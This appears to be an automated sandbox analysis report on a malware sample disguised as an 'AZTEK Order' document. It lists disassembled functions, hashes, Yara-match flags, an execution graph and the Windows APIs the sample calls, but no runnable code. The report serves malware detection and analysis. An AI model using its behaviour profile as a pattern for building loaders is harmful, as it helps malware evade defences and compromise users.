                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7960e5f700e4acab80e9da37166f4e15fd221fd65f6a4e64a68fa9c1b6acfb3
                                                      • Instruction ID: 7e1fd67cd6ba7091a446b5122ab15dc2f48bac8e156575aff81a57ceccfdce54
                                                      • Opcode Fuzzy Hash: e7960e5f700e4acab80e9da37166f4e15fd221fd65f6a4e64a68fa9c1b6acfb3
                                                      • Instruction Fuzzy Hash: B1C09B30D24535C5D344E774DD50C5D77B1EA80704700596D5045560A6CB94BE0565C1
                                                      Function 06DA0DA9 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c78b5c6895e9530efaae1976a969358ebad7929e2805ec9414b04be25c97ebf4
                                                      • Instruction ID: ac4e837bd785f4cb3f50ed91827d4099d7830e4f68dbd0233c9e68636fafc607
                                                      • Opcode Fuzzy Hash: c78b5c6895e9530efaae1976a969358ebad7929e2805ec9414b04be25c97ebf4
                                                      • Instruction Fuzzy Hash: 5EC04C74645205DFDB15CB50D15846A7BB2FF4821A7604558E44652650CB31ED01DF51
                                                      Function 06DA4AD1 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0aa914a4a47dbca814d9e74416253a3301a80a7b557de14ac1c5b03fde77a4a6
                                                      • Instruction ID: 21d94220750fe9534bbcff7da490ea59f5f0c1ac2f37c3bfcf77152a7028ba04
                                                      • Opcode Fuzzy Hash: 0aa914a4a47dbca814d9e74416253a3301a80a7b557de14ac1c5b03fde77a4a6
                                                      • Instruction Fuzzy Hash: 09A001CBC189A222DA802958E8D33890AA1ABB9747FD861D5C015E6342E49C92892663

                                                      Non-executed Functions

                                                      Function 06DA2450 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ax^
                                                      • API String ID: 0-994873808
                                                      • Opcode ID: 8e3a4aa70b635161dc8c8a996f9966463c094ab066677f580f8994951bec3a66
                                                      • Instruction ID: d729c77c594502fba5222ee325d50b21c163fe52ab806fcd8225631f29a1a227
                                                      • Opcode Fuzzy Hash: 8e3a4aa70b635161dc8c8a996f9966463c094ab066677f580f8994951bec3a66
                                                      • Instruction Fuzzy Hash: 4041C375F2830A8FDB80CF9AC8959AEFBF5BB9C300B098526D545EB351C274DA01CB91
                                                      Function 06DA2460 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ax^
                                                      • API String ID: 0-994873808
                                                      • Opcode ID: c935640500f776a6f5b53969e0a6312efb9793c5b7fac7cd86696665ef5668dd
                                                      • Instruction ID: 0c0e59a1c45614144f78c9a0f2382c76cc9f328fce2128eece4371946b46a51c
                                                      • Opcode Fuzzy Hash: c935640500f776a6f5b53969e0a6312efb9793c5b7fac7cd86696665ef5668dd
                                                      • Instruction Fuzzy Hash: 8A41A275F2830A8FDB80CF9AC8859AEF7F5BB9C300B198426D545EB750D274DA018B91
                                                      Function 04886138 Relevance: .3, Instructions: 344COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 378a1571bb41dcd9f66d0d67b90cbee1629f034c1771720f9de5b088ac299bde
                                                      • Instruction ID: 149543a52fa9fd792828d5869edb5a036a519abbe28ebd8b36b48b8ac9d32a20
                                                      • Opcode Fuzzy Hash: 378a1571bb41dcd9f66d0d67b90cbee1629f034c1771720f9de5b088ac299bde
                                                      • Instruction Fuzzy Hash: 8AC19A317006009BEB29EBB9C46076E77F6AF89704F544AADD146EB391EF34E902C752
                                                      Function 04880C50 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f07bf82b1d997cea33412647c176f12e6ce7c122815ba569021278156be642d8
                                                      • Instruction ID: c131cb2b7d3d122e1c09e31039b7b07935634deb896649c5e618fc78bc91feeb
                                                      • Opcode Fuzzy Hash: f07bf82b1d997cea33412647c176f12e6ce7c122815ba569021278156be642d8
                                                      • Instruction Fuzzy Hash: E5E11B74E002598FDB14DFA9C580AAEFBF2FF49304F248659D814AB356DB70A946CF60
                                                      Function 04881600 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 145f62b445735f8b2e6e599f4973969ab6aff3260389e603b588f29d7dc5ff6c
                                                      • Instruction ID: db6230377811320338325bab67e1251f7c53dec80d51491b1fa5a46bbb1205c4
                                                      • Opcode Fuzzy Hash: 145f62b445735f8b2e6e599f4973969ab6aff3260389e603b588f29d7dc5ff6c
                                                      • Instruction Fuzzy Hash: A0E10B74E002598FDB14DFA9C584AAEFBF2FF49304F248669D414AB355DB70A942CFA0
                                                      Function 04881AF8 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4550cb6a132d481de7925d7cc7aba6a29a307125f5f28b4f98bee8e21bb7793
                                                      • Instruction ID: a85cedd81341b43d4c4b3ab865d2d9be004cc022402cd3ce5107730ebc83f794
                                                      • Opcode Fuzzy Hash: d4550cb6a132d481de7925d7cc7aba6a29a307125f5f28b4f98bee8e21bb7793
                                                      • Instruction Fuzzy Hash: FBE11C74E001598FDB14DFA9C584AAEFBF2FF88304F248659D414AB355DB70A942CFA0
                                                      Function 06DAF238 Relevance: .3, Instructions: 312COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9c2a15fe0a60b86554ad188af0dee07ea984ddd2d1af9314a4400cec48a6556
                                                      • Instruction ID: 279114c8e4534c4858ac1c6cf55d4ff0d9ef779f1e72276284004ab4fc3c1b29
                                                      • Opcode Fuzzy Hash: c9c2a15fe0a60b86554ad188af0dee07ea984ddd2d1af9314a4400cec48a6556
                                                      • Instruction Fuzzy Hash: D9E11C74E042598FDB14DFA9C580AAEFBF2FF88304F248299D454AB355D770A942CFA1
                                                      Function 04886DD8 Relevance: .3, Instructions: 298COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a3294d8529e3fa018faaaafbcdab23622a6c316b41c2bc8a09227d1f72f98b
                                                      • Instruction ID: 3e6b7415a94b6aa19c4f5ab578687d530f4f9a6f1351362871fd15a2c90a5f9b
                                                      • Opcode Fuzzy Hash: c6a3294d8529e3fa018faaaafbcdab23622a6c316b41c2bc8a09227d1f72f98b
                                                      • Instruction Fuzzy Hash: 35D1A434A00605CFDB18EF69C998AA9B7F1BF4D705F2585A8E505EB361DB31AD40CF60
                                                      Function 06DA7967 Relevance: .3, Instructions: 270COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 675d6c3ea4b5785104ae15e564a8ccb73eee4db847d60d597f5ac5ce687e4fc9
                                                      • Instruction ID: 89823d6300cadc49731f256e42f1564cf1f9913356349349a7fbd513bf8c0107
                                                      • Opcode Fuzzy Hash: 675d6c3ea4b5785104ae15e564a8ccb73eee4db847d60d597f5ac5ce687e4fc9
                                                      • Instruction Fuzzy Hash: 0ED1FA31920B5ACACB04EBA4D995A99F7B1FF95300F20D79AE5093B251FF706AC4CB41
                                                      Function 00B9D364 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d808f4fd177878989cd5ecae8130d971061ef1798ccace585b67e2bba697003e
                                                      • Instruction ID: 131c82a72efecfe89c0d8c29f5ab1aa656a2ef71e7e145493c5462c3e4a37952
                                                      • Opcode Fuzzy Hash: d808f4fd177878989cd5ecae8130d971061ef1798ccace585b67e2bba697003e
                                                      • Instruction Fuzzy Hash: E7A16C36E002068FCF05DFA4C8445AEB7F6FF84314B2585BAE901EB262DB75D915CB40
                                                      Function 06DA7978 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30718f037701dacbace77e646f525adad84feb4ed00eb56e6b022237f965ecd3
                                                      • Instruction ID: 969c400b99f3580c5b33a555be198b1a701efea3b9a358852a9698f70b69624a
                                                      • Opcode Fuzzy Hash: 30718f037701dacbace77e646f525adad84feb4ed00eb56e6b022237f965ecd3
                                                      • Instruction Fuzzy Hash: 6AD1FB31920B5ACACB14EB64D990A99F7B1FF95300F20D79AE5093B251FF706AC4CB41
                                                      Function 06DA1918 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 377036da31933e9f71acd829eefb797322b58946b6660a661bf4ccf5aa14e0cb
                                                      • Instruction ID: 962e7b4ee82b1a6c8a3145dc6f52246277a15faf1e319947fa82700f6fc5a58e
                                                      • Opcode Fuzzy Hash: 377036da31933e9f71acd829eefb797322b58946b6660a661bf4ccf5aa14e0cb
                                                      • Instruction Fuzzy Hash: 0741F231714706CFD760CB69C984A5ABBF2FF84350F04C82AE1AACB664D234E945CF41
                                                      Function 06DA190A Relevance: .1, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f813528d971198044c0bdacfdc9be98615cce270504d00abc076483eaf11eac5
                                                      • Instruction ID: 4f92f9602bcb6e435ebf11b67922932d1a2243311aaa87b112335c2d2b386ff2
                                                      • Opcode Fuzzy Hash: f813528d971198044c0bdacfdc9be98615cce270504d00abc076483eaf11eac5
                                                      • Instruction Fuzzy Hash: E441D371B14706CFD750CB69C985A5ABBF2FF84350F04C82AD0AACB664D234E945CF41

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:5%
                                                      Signature Coverage:8.5%
                                                      Total number of Nodes:141
                                                      Total number of Limit Nodes:10
                                                      execution_graph 93376 424863 93381 424872 93376->93381 93377 4248fc 93378 4248b9 93384 42d553 93378->93384 93381->93377 93381->93378 93382 4248f7 93381->93382 93383 42d553 RtlFreeHeap 93382->93383 93383->93377 93387 42b9c3 93384->93387 93386 4248c9 93388 42b9e0 93387->93388 93389 42b9ee RtlFreeHeap 93388->93389 93389->93386 93390 41b1e0 93391 41b1e3 93390->93391 93393 41b17c 93390->93393 93392 41b1c8 93393->93392 93395 42b683 93393->93395 93396 42b69d 93395->93396 93397 42b6ab NtClose 93396->93397 93397->93392 93448 42e633 93449 42e643 93448->93449 93450 42e649 93448->93450 93451 42d633 RtlAllocateHeap 93450->93451 93452 42e66f 93451->93452 93453 4244d3 93454 4244ef 93453->93454 93455 424517 93454->93455 93456 42452b 93454->93456 93457 42b683 NtClose 93455->93457 93458 42b683 NtClose 93456->93458 93459 424520 93457->93459 93460 424534 93458->93460 93463 42d673 RtlAllocateHeap 93460->93463 93462 42453f 93463->93462 93464 42acf3 93465 42ad10 93464->93465 93468 17e2df0 LdrInitializeThunk 93465->93468 93466 42ad35 93468->93466 93398 414143 93399 41415c 93398->93399 93404 417b13 93399->93404 93401 41417a 93402 4141c6 93401->93402 93403 4141b3 PostThreadMessageW 93401->93403 93403->93402 93406 417b37 93404->93406 93405 417b3e 93405->93401 93406->93405 93407 417b73 LdrLoadDll 93406->93407 93408 417b8a 93406->93408 93407->93408 93408->93401 93409 41a683 93410 41a698 93409->93410 93412 41a6f2 93409->93412 93410->93412 93413 41e283 93410->93413 93414 41e2a9 93413->93414 93418 41e394 93414->93418 93419 42e763 93414->93419 93416 41e33b 93416->93418 93425 42ad43 93416->93425 93418->93412 93420 42e6d3 93419->93420 93421 42e730 93420->93421 93429 42d633 93420->93429 93421->93416 93423 42e70d 93424 42d553 RtlFreeHeap 93423->93424 93424->93421 93426 42ad5d 93425->93426 93435 17e2c0a 93426->93435 93427 42ad86 93427->93418 93432 42b973 93429->93432 93431 42d64e 93431->93423 93433 42b990 93432->93433 93434 42b99e RtlAllocateHeap 93433->93434 93434->93431 93436 17e2c1f LdrInitializeThunk 93435->93436 93437 17e2c11 93435->93437 93436->93427 93437->93427 93438 413d45 93439 413ce0 93438->93439 93440 413d4d 93438->93440 93443 42b8e3 93439->93443 93444 42b8fd 93443->93444 93447 17e2c70 LdrInitializeThunk 93444->93447 93445 413ce5 93447->93445 93469 418d18 93470 42b683 NtClose 93469->93470 93471 418d22 93470->93471 93472 4018d9 93473 40189f 93472->93473 93476 42eaf3 93473->93476 93479 42d143 93476->93479 93480 42d169 93479->93480 93491 407393 93480->93491 93482 42d17f 93483 401a18 93482->93483 93494 41af73 93482->93494 93485 42d19e 93486 42d1b3 93485->93486 93509 42ba13 93485->93509 93505 427793 93486->93505 93489 42d1c2 93490 42ba13 ExitProcess 93489->93490 93490->93483 93512 416843 93491->93512 93493 4073a0 93493->93482 93495 41af9f 93494->93495 93527 41ae63 93495->93527 93498 41afe4 93500 41b000 93498->93500 93503 42b683 NtClose 93498->93503 93499 41afcc 93501 41afd7 93499->93501 93502 42b683 NtClose 93499->93502 93500->93485 93501->93485 93502->93501 93504 41aff6 93503->93504 93504->93485 93506 4277ed 93505->93506 93508 4277fa 93506->93508 93538 418663 93506->93538 93508->93489 93510 42ba2d 93509->93510 93511 42ba3e ExitProcess 93510->93511 93511->93486 93514 41685a 93512->93514 93513 416870 93513->93493 93514->93513 93519 42c0c3 93514->93519 93516 4168be 93516->93513 93526 4283c3 NtClose LdrInitializeThunk 93516->93526 93518 4168e4 93518->93493 93521 42c0db 93519->93521 93520 42c0ff 93520->93516 93521->93520 93522 42ad43 LdrInitializeThunk 93521->93522 93523 42c151 93522->93523 93524 42d553 RtlFreeHeap 93523->93524 93525 42c16a 93524->93525 93525->93516 93526->93518 93528 41ae7d 93527->93528 93532 41af59 93527->93532 93533 42ade3 93528->93533 93531 42b683 NtClose 93531->93532 93532->93498 93532->93499 93534 42ae00 93533->93534 93537 17e35c0 LdrInitializeThunk 93534->93537 93535 41af4d 93535->93531 93537->93535 93540 418664 93538->93540 93539 418afb 93539->93508 93540->93539 93546 414273 93540->93546 93542 41879a 93542->93539 93543 42d553 RtlFreeHeap 93542->93543 93544 4187b2 93543->93544 93544->93539 93545 42ba13 ExitProcess 93544->93545 93545->93539 93548 414292 93546->93548 93547 4143b0 93547->93542 93548->93547 93550 413cc3 LdrInitializeThunk 93548->93550 93550->93547 93551 17e2b60 LdrInitializeThunk

                                                      Executed Functions

                                                      Function 00417B13 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 85 417b13-417b3c call 42e253 88 417b42-417b50 call 42e773 85->88 89 417b3e-417b41 85->89 92 417b60-417b71 call 42cc13 88->92 93 417b52-417b5d call 42ea13 88->93 98 417b73-417b87 LdrLoadDll 92->98 99 417b8a-417b8d 92->99 93->92 98->99
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction ID: 5084c3d16cd78f6066525c9c02257e451d1bbec126aea60e2d452a5e7d2945bd
                                                      • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                      • Instruction Fuzzy Hash: 410152B1E4410DB7DF10DAA1DC42FDEB3789B54308F004196E90897240F675EB448B95
                                                      Function 0042B683 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 110 42b683-42b6b9 call 404843 call 42c723 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,0041674F,001F0001,?,00000000,?,?,00000104), ref: 0042B6B4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction ID: 727abfe5acca37f02523496ed090aec1a3da151eb2021070b30343ae6eafb1de
                                                      • Opcode Fuzzy Hash: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                      • Instruction Fuzzy Hash: CEE0463A2002147BC620BA5AEC42F9B776CDBC5718F40442AFA08A7242C775BA148AE4
                                                      Function 017E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 124 17e2b60-17e2b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                      • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                      • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                      • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                      Function 017E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                      • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                      • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                      • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                      Function 017E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                      • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                      • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                      • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                      Function 017E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                      • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                      • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                      • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3
                                                      Function 00414143 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                      • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                      • Opcode Fuzzy Hash: 8ea4ead0e8cd57c9f89eace35bfd1dc7174b74ea8ef28197ce62b30bf92eeec6
                                                      • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9
                                                      Function 00414142 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                      • Instruction ID: dbf1be6ef26193e51bcc14fecf1d30848757df0a307f1d3da546311ca6c9474a
                                                      • Opcode Fuzzy Hash: 4726a8767bcfae0c73df2ffdf9b9d8f716a96223d0d12ea76fede153f4199ba2
                                                      • Instruction Fuzzy Hash: AC012671E4421876EB20AA919C02FDF7B7C8F81B54F00405AFA047B2C0D6FC6A028BE9
                                                      Function 00414129 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 28 414129-414130 29 414171-414174 28->29 30 414132-41413a 28->30 31 41417a-4141b1 call 4047b3 call 424973 29->31 32 414175 call 417b13 29->32 37 4141d3-4141d8 31->37 38 4141b3-4141c4 PostThreadMessageW 31->38 32->31 38->37 39 4141c6-4141d0 38->39 39->37
                                                      APIs
